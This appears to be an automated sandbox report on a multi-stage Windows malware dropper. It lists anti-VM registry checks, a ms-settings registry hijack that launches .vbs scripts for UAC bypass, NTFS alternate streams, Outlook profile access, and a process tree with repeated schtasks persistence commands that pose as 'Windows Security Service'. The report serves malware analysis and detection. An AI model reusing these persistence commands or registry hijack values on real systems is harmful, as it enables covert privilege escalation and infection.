description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName output.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation output.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0 output.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer output.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe -
Kills process with taskkill 3 IoCs
pid Process 6504 taskkill.exe 5788 taskkill.exe 6452 taskkill.exe -
Modifies registry class 34 IoCs
description ioc Process Key deleted \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings\Shell\Open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings\Shell\Open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings\Shell\Open\command reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\6651.vbs" reg.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings\Shell\Open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\3082.vbs" reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings\Shell reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings\Shell reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings powershell.exe Key deleted \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings\Shell reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings\Shell\Open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\4210.vbs" reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\ms-settings\Shell\Open reg.exe -
NTFS ADS 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P cmd.exe File created C:\IMG001.exe\:P:$DATA IMG001.exe -
Runs ping.exe 1 TTPs 42 IoCs
pid Process 5904 PING.EXE 8516 PING.EXE 1404 PING.EXE 7260 PING.EXE 5992 PING.EXE 7372 PING.EXE 3096 PING.EXE 8356 PING.EXE 1432 PING.EXE 1112 PING.EXE 6504 PING.EXE 9088 PING.EXE 5292 PING.EXE 5344 PING.EXE 7896 PING.EXE 5520 PING.EXE 656 PING.EXE 6108 PING.EXE 7516 PING.EXE 3336 PING.EXE 5224 PING.EXE 8488 PING.EXE 5148 PING.EXE 8920 PING.EXE 3712 PING.EXE 1236 PING.EXE 3496 PING.EXE 8100 PING.EXE 5872 PING.EXE 5008 PING.EXE 4480 PING.EXE 5788 PING.EXE 2788 PING.EXE 5748 PING.EXE 6344 PING.EXE 8236 PING.EXE 6728 PING.EXE 2580 PING.EXE 7084 PING.EXE 2572 PING.EXE 688 PING.EXE 3800 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 47 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5096 schtasks.exe 3356 schtasks.exe 8004 schtasks.exe 3096 schtasks.exe 4264 schtasks.exe 5528 schtasks.exe 1136 schtasks.exe 8816 schtasks.exe 5348 schtasks.exe 7628 schtasks.exe 7740 schtasks.exe 1196 schtasks.exe 7976 schtasks.exe 3032 schtasks.exe 7132 schtasks.exe 6952 schtasks.exe 4220 schtasks.exe 2732 schtasks.exe 1732 schtasks.exe 2572 schtasks.exe 8452 schtasks.exe 7304 schtasks.exe 2352 schtasks.exe 4844 schtasks.exe 8820 schtasks.exe 8000 schtasks.exe 1440 schtasks.exe 1640 schtasks.exe 7228 schtasks.exe 8452 schtasks.exe 1644 schtasks.exe 3212 schtasks.exe 3756 schtasks.exe 5704 schtasks.exe 6380 schtasks.exe 8712 schtasks.exe 8680 schtasks.exe 4320 schtasks.exe 1012 schtasks.exe 2908 schtasks.exe 7176 schtasks.exe 6344 schtasks.exe 6900 schtasks.exe 1832 schtasks.exe 4228 schtasks.exe 8704 schtasks.exe 2572 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4864 powershell.exe 4864 powershell.exe 2076 aidans.dont.run.exe 2076 aidans.dont.run.exe 2076 aidans.dont.run.exe 2076 aidans.dont.run.exe 2076 aidans.dont.run.exe 2076 aidans.dont.run.exe 2076 aidans.dont.run.exe 2076 aidans.dont.run.exe 2076 aidans.dont.run.exe 2076 aidans.dont.run.exe 2076 aidans.dont.run.exe 2076 aidans.dont.run.exe 2076 aidans.dont.run.exe 2076 aidans.dont.run.exe 2076 aidans.dont.run.exe 4088 xs.exe 4088 xs.exe 4088 xs.exe 2076 aidans.dont.run.exe 2076 aidans.dont.run.exe 4088 xs.exe 4088 xs.exe 3660 powershell.exe 2076 aidans.dont.run.exe 2076 aidans.dont.run.exe 4088 xs.exe 4088 xs.exe 2076 aidans.dont.run.exe 2076 aidans.dont.run.exe 2076 aidans.dont.run.exe 2076 aidans.dont.run.exe 2076 aidans.dont.run.exe 2076 aidans.dont.run.exe 4088 xs.exe 4088 xs.exe 2076 aidans.dont.run.exe 2076 aidans.dont.run.exe 4088 xs.exe 4088 xs.exe 2076 aidans.dont.run.exe 2076 aidans.dont.run.exe 4088 xs.exe 4088 xs.exe 2076 aidans.dont.run.exe 2076 aidans.dont.run.exe 4088 xs.exe 4088 xs.exe 2076 aidans.dont.run.exe 2076 aidans.dont.run.exe 1784 aa.exe 1784 aa.exe 1784 aa.exe 1784 aa.exe 1784 aa.exe 2076 aidans.dont.run.exe 2076 aidans.dont.run.exe 4088 xs.exe 4088 xs.exe 1784 aa.exe 1784 aa.exe 4088 xs.exe 4088 xs.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1468 New Text Document mod.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 2204 chrome.exe 2204 chrome.exe 2204 chrome.exe 5836 msedge.exe 5836 msedge.exe 5836 msedge.exe 5836 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1468 New Text Document mod.exe Token: SeDebugPrivilege 336 SGVP%20Client%20Users.exe Token: SeDebugPrivilege 2308 Registry.exe Token: SeDebugPrivilege 1040 Runtime Broker.exe Token: SeDebugPrivilege 4908 seksiak.exe Token: SeDebugPrivilege 3232 output.exe Token: SeDebugPrivilege 1124 saloader.exe Token: SeDebugPrivilege 4864 powershell.exe Token: SeDebugPrivilege 4028 Loader.exe Token: SeDebugPrivilege 3392 Tutorial.exe Token: SeDebugPrivilege 1784 aa.exe Token: SeDebugPrivilege 2864 nobody.exe Token: SeDebugPrivilege 2076 aidans.dont.run.exe Token: SeDebugPrivilege 2076 aidans.dont.run.exe Token: SeDebugPrivilege 4088 xs.exe Token: SeDebugPrivilege 3660 powershell.exe Token: SeDebugPrivilege 4464 powershell.exe Token: SeDebugPrivilege 2312 powershell.exe Token: SeIncreaseQuotaPrivilege 1012 wmic.exe Token: SeSecurityPrivilege 1012 wmic.exe Token: SeTakeOwnershipPrivilege 1012 wmic.exe Token: SeLoadDriverPrivilege 1012 wmic.exe Token: SeSystemProfilePrivilege 1012 wmic.exe Token: SeSystemtimePrivilege 1012 wmic.exe Token: SeProfSingleProcessPrivilege 1012 wmic.exe Token: SeIncBasePriorityPrivilege 1012 wmic.exe Token: SeCreatePagefilePrivilege 1012 wmic.exe Token: SeBackupPrivilege 1012 wmic.exe Token: SeRestorePrivilege 1012 wmic.exe Token: SeShutdownPrivilege 1012 wmic.exe Token: SeDebugPrivilege 1012 wmic.exe Token: SeSystemEnvironmentPrivilege 1012 wmic.exe Token: SeRemoteShutdownPrivilege 1012 wmic.exe Token: SeUndockPrivilege 1012 wmic.exe Token: SeManageVolumePrivilege 1012 wmic.exe Token: 33 1012 wmic.exe Token: 34 1012 wmic.exe Token: 35 1012 wmic.exe Token: 36 1012 wmic.exe Token: SeIncreaseQuotaPrivilege 1012 wmic.exe Token: SeSecurityPrivilege 1012 wmic.exe Token: SeTakeOwnershipPrivilege 1012 wmic.exe Token: SeLoadDriverPrivilege 1012 wmic.exe Token: SeSystemProfilePrivilege 1012 wmic.exe Token: SeSystemtimePrivilege 1012 wmic.exe Token: SeProfSingleProcessPrivilege 1012 wmic.exe Token: SeIncBasePriorityPrivilege 1012 wmic.exe Token: SeCreatePagefilePrivilege 1012 wmic.exe Token: SeBackupPrivilege 1012 wmic.exe Token: SeRestorePrivilege 1012 wmic.exe Token: SeShutdownPrivilege 1012 wmic.exe Token: SeDebugPrivilege 1012 wmic.exe Token: SeSystemEnvironmentPrivilege 1012 wmic.exe Token: SeRemoteShutdownPrivilege 1012 wmic.exe Token: SeUndockPrivilege 1012 wmic.exe Token: SeManageVolumePrivilege 1012 wmic.exe Token: 33 1012 wmic.exe Token: 34 1012 wmic.exe Token: 35 1012 wmic.exe Token: 36 1012 wmic.exe Token: SeIncreaseQuotaPrivilege 2404 wmic.exe Token: SeSecurityPrivilege 2404 wmic.exe Token: SeTakeOwnershipPrivilege 2404 wmic.exe Token: SeLoadDriverPrivilege 2404 wmic.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1040 Runtime Broker.exe 1860 xblkpfZ8Y4.exe 2204 chrome.exe 2204 chrome.exe 2204 chrome.exe 2204 chrome.exe 2204 chrome.exe 2204 chrome.exe 2204 chrome.exe 2204 chrome.exe 2204 chrome.exe 2204 chrome.exe 2204 chrome.exe 2204 chrome.exe 2204 chrome.exe 2204 chrome.exe 2204 chrome.exe 2204 chrome.exe 2204 chrome.exe 2204 chrome.exe 2204 chrome.exe 2204 chrome.exe 2204 chrome.exe 2204 chrome.exe 2204 chrome.exe 2204 chrome.exe 2204 chrome.exe 2204 chrome.exe 5836 msedge.exe 5836 msedge.exe 5836 msedge.exe 5836 msedge.exe 5836 msedge.exe 5836 msedge.exe 5836 msedge.exe 5836 msedge.exe 5836 msedge.exe 5836 msedge.exe 5836 msedge.exe 5836 msedge.exe 5836 msedge.exe 5836 msedge.exe 5836 msedge.exe 5836 msedge.exe 5836 msedge.exe 5836 msedge.exe 5836 msedge.exe 5836 msedge.exe 5836 msedge.exe 5836 msedge.exe 5836 msedge.exe 5836 msedge.exe 5836 msedge.exe 3068 AmLzNi.exe 3068 AmLzNi.exe 3068 AmLzNi.exe 3068 AmLzNi.exe 3068 AmLzNi.exe 3068 AmLzNi.exe 3068 AmLzNi.exe 3068 AmLzNi.exe 3068 AmLzNi.exe 3068 AmLzNi.exe 3068 AmLzNi.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 1040 Runtime Broker.exe 3068 AmLzNi.exe 3068 AmLzNi.exe 3068 AmLzNi.exe 3068 AmLzNi.exe 3068 AmLzNi.exe 3068 AmLzNi.exe 3068 AmLzNi.exe 3068 AmLzNi.exe 3068 AmLzNi.exe 3068 AmLzNi.exe 3068 AmLzNi.exe 3068 AmLzNi.exe 3068 AmLzNi.exe 3068 AmLzNi.exe 3068 AmLzNi.exe 3068 AmLzNi.exe 3068 AmLzNi.exe 6708 Mesa.com 6708 Mesa.com 6708 Mesa.com 768 Reynolds.com 768 Reynolds.com 768 Reynolds.com -
Suspicious use of SetWindowsHookEx 38 IoCs
pid Process 2864 nobody.exe 2004 atat.exe 5668 tik-tok-1.0.5.0-installer_iPXA-F1.exe 5668 tik-tok-1.0.5.0-installer_iPXA-F1.exe 5576 seksiak.exe 6084 seksiak.exe 7480 seksiak.exe 6804 seksiak.exe 2148 seksiak.exe 8632 seksiak.exe 5928 seksiak.exe 984 seksiak.exe 3088 MSBuild.exe 7404 seksiak.exe 6804 seksiak.exe 5804 MSBuild.exe 4628 seksiak.exe 3212 seksiak.exe 6368 seksiak.exe 6684 seksiak.exe 6284 seksiak.exe 8052 seksiak.exe 8496 seksiak.exe 4744 seksiak.exe 5624 seksiak.exe 8128 seksiak.exe 3352 9758xBqgE1azKnB.exe 4392 seksiak.exe 3080 seksiak.exe 8404 seksiak.exe 9208 seksiak.exe 4760 seksiak.exe 2768 seksiak.exe 2960 seksiak.exe 2276 seksiak.exe 5136 seksiak.exe 768 seksiak.exe 8356 seksiak.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1468 wrote to memory of 336 1468 New Text Document mod.exe 79 PID 1468 wrote to memory of 336 1468 New Text Document mod.exe 79 PID 1468 wrote to memory of 2308 1468 New Text Document mod.exe 80 PID 1468 wrote to memory of 2308 1468 New Text Document mod.exe 80 PID 2308 wrote to memory of 1832 2308 Registry.exe 81 PID 2308 wrote to memory of 1832 2308 Registry.exe 81 PID 2308 wrote to memory of 1040 2308 Registry.exe 83 PID 2308 wrote to memory of 1040 2308 Registry.exe 83 PID 1468 wrote to memory of 4908 1468 New Text Document mod.exe 84 PID 1468 wrote to memory of 4908 1468 New Text Document mod.exe 84 PID 1468 wrote to memory of 2740 1468 New Text Document mod.exe 85 PID 1468 wrote to memory of 2740 1468 New Text Document mod.exe 85 PID 1468 wrote to memory of 2740 1468 New Text Document mod.exe 85 PID 1040 wrote to memory of 2352 1040 Runtime Broker.exe 86 PID 1040 wrote to memory of 2352 1040 Runtime Broker.exe 86 PID 1468 wrote to memory of 4028 1468 New Text Document mod.exe 87 PID 1468 wrote to memory of 4028 1468 New Text Document mod.exe 87 PID 4908 wrote to memory of 4844 4908 seksiak.exe 88 PID 4908 wrote to memory of 4844 4908 seksiak.exe 88 PID 1468 wrote to memory of 3232 1468 New Text Document mod.exe 91 PID 1468 wrote to memory of 3232 1468 New Text Document mod.exe 91 PID 4908 wrote to memory of 3684 4908 seksiak.exe 93 PID 4908 wrote to memory of 3684 4908 seksiak.exe 93 PID 3684 wrote to memory of 5020 3684 cmd.exe 95 PID 3684 wrote to memory of 5020 3684 cmd.exe 95 PID 3684 wrote to memory of 1236 3684 cmd.exe 96 PID 3684 wrote to memory of 1236 3684 cmd.exe 96 PID 1468 wrote to memory of 1124 1468 New Text Document mod.exe 97 PID 1468 wrote to memory of 1124 1468 New Text Document mod.exe 97 PID 1124 wrote to memory of 2464 1124 saloader.exe 98 PID 1124 wrote to memory of 2464 1124 saloader.exe 98 PID 1468 wrote to memory of 2076 1468 New Text Document mod.exe 100 PID 1468 wrote to memory of 2076 1468 New Text Document mod.exe 100 PID 1124 wrote to memory of 4864 1124 saloader.exe 101 PID 1124 wrote to memory of 4864 1124 saloader.exe 101 PID 1468 wrote to memory of 2020 1468 New Text Document mod.exe 103 PID 1468 wrote to memory of 2020 1468 New Text Document mod.exe 103 PID 1468 wrote to memory of 2020 1468 New Text Document mod.exe 103 PID 1468 wrote to memory of 4088 1468 New Text Document mod.exe 104 PID 1468 wrote to memory of 4088 1468 New Text Document mod.exe 104 PID 1468 wrote to memory of 3392 1468 New Text Document mod.exe 105 PID 1468 wrote to memory of 3392 1468 New Text Document mod.exe 105 PID 1468 wrote to memory of 3392 1468 New Text Document mod.exe 105 PID 1468 wrote to memory of 1784 1468 New Text Document mod.exe 106 PID 1468 wrote to memory of 1784 1468 New Text Document mod.exe 106 PID 1468 wrote to memory of 2864 1468 New Text Document mod.exe 107 PID 1468 wrote to memory of 2864 1468 New Text Document mod.exe 107 PID 1468 wrote to memory of 2416 1468 New Text Document mod.exe 108 PID 1468 wrote to memory of 2416 1468 New Text Document mod.exe 108 PID 1124 wrote to memory of 3660 1124 saloader.exe 109 PID 1124 wrote to memory of 3660 1124 saloader.exe 109 PID 1468 wrote to memory of 4100 1468 New Text Document mod.exe 111 PID 1468 wrote to memory of 4100 1468 New Text Document mod.exe 111 PID 1468 wrote to memory of 4100 1468 New Text Document mod.exe 111 PID 3392 wrote to memory of 2796 3392 Tutorial.exe 112 PID 3392 wrote to memory of 2796 3392 Tutorial.exe 112 PID 3392 wrote to memory of 2796 3392 Tutorial.exe 112 PID 3392 wrote to memory of 2796 3392 Tutorial.exe 112 PID 3392 wrote to memory of 2796 3392 Tutorial.exe 112 PID 3392 wrote to memory of 2796 3392 Tutorial.exe 112 PID 3392 wrote to memory of 2796 3392 Tutorial.exe 112 PID 3392 wrote to memory of 2796 3392 Tutorial.exe 112 PID 1124 wrote to memory of 4464 1124 saloader.exe 113 PID 1124 wrote to memory of 4464 1124 saloader.exe 113 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2464 attrib.exe -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook gvndxfghs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook gvndxfghs.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3288
-
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"2⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Users\Admin\AppData\Local\Temp\a\SGVP%20Client%20Users.exe"C:\Users\Admin\AppData\Local\Temp\a\SGVP%20Client%20Users.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:336
-
-
C:\Users\Admin\AppData\Local\Temp\a\Registry.exe"C:\Users\Admin\AppData\Local\Temp\a\Registry.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:1832
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe"C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1040 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:2352
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4908 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:4844
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\X4rx26j2GZlE.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:3684 -
C:\Windows\system32\chcp.comchcp 650015⤵PID:5020
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1236
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"5⤵
- Executes dropped EXE
PID:4172 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:4320
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6UmhzFiYBs65.bat" "6⤵PID:4868
-
C:\Windows\system32\chcp.comchcp 650017⤵PID:1416
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost7⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3496
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"7⤵
- Executes dropped EXE
PID:3548 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:2572
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gJJMmyLjfAog.bat" "8⤵PID:1092
-
C:\Windows\system32\chcp.comchcp 650019⤵PID:1260
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost9⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:656
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"9⤵
- Executes dropped EXE
PID:2836 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f10⤵
- Scheduled Task/Job: Scheduled Task
PID:1012
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qZk24bww540X.bat" "10⤵PID:2028
-
C:\Windows\system32\chcp.comchcp 6500111⤵PID:4084
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost11⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1404
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"11⤵
- Executes dropped EXE
PID:3796 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f12⤵
- Scheduled Task/Job: Scheduled Task
PID:3756
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\INJDV05lh4r6.bat" "12⤵PID:3672
-
C:\Windows\system32\chcp.comchcp 6500113⤵PID:4732
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost13⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:688
-
-
C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"13⤵
- Executes dropped EXE
PID:4760 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f14⤵
- Scheduled Task/Job: Scheduled Task
PID:2732
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2CxRC1NbWUtE.bat" "14⤵PID:4484
-
C:\Windows\system32\chcp.comchcp 6500115⤵PID:1204
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost15⤵
- System Network Configuration Discovery: Internet Connection Discovery
